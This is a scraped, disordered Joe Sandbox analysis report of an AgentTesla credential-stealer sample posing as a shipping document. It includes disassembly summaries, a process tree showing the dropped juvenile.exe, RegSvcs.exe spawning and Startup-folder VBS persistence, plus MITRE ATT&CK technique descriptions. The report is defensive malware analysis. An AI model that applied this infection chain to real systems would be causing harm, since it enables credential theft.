API String ID: 529655941-2988720461
Opcode ID: d211a211c5911641b7e5788b4a85f703887015cbcebd75f2b97da90fd964d369
Instruction ID: 2a31420ad5b557e19a1ec975812a0f7c66082c4a3097242eaac465f6a5f2a960
Opcode Fuzzy Hash: d211a211c5911641b7e5788b4a85f703887015cbcebd75f2b97da90fd964d369
Instruction Fuzzy Hash: 53D0C971385314ABF2B8A7B0AC0BFC67A189B04B11F104A19B645AA1D1C9A9AD508A68

Function 006E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006E86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006E86B5

Part of subcall function 006C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006C7AD0

Strings

Shell_TrayWnd, xrefs: 006E869B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f89a588f4d173357b7f291641e2821e554662245fb776771b09908e5bc22ec74
Instruction ID: 581150a1bbeba81ec05c9bd35b2ba863aff1b7c46d45224902a68858e71f606e
Opcode Fuzzy Hash: f89a588f4d173357b7f291641e2821e554662245fb776771b09908e5bc22ec74
Instruction Fuzzy Hash: 31D0C971384314ABE2B8A7B0AC0BFD67A189B04B11F104A19B649AA1D1C9A9AD508A68

Source: unknown	Process created: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut78D1.tmp

C:\Users\user\AppData\Local\Temp\aut816D.tmp

C:\Users\user\AppData\Local\Temp\aut8AB4.tmp

C:\Users\user\AppData\Local\Temp\autB07B.tmp

C:\Users\user\AppData\Local\Temp\autB984.tmp

C:\Users\user\AppData\Local\Temp\gammy

C:\Users\user\AppData\Local\cyclop\juvenile.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Function 006AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00683D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0069DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0068406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 006CFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre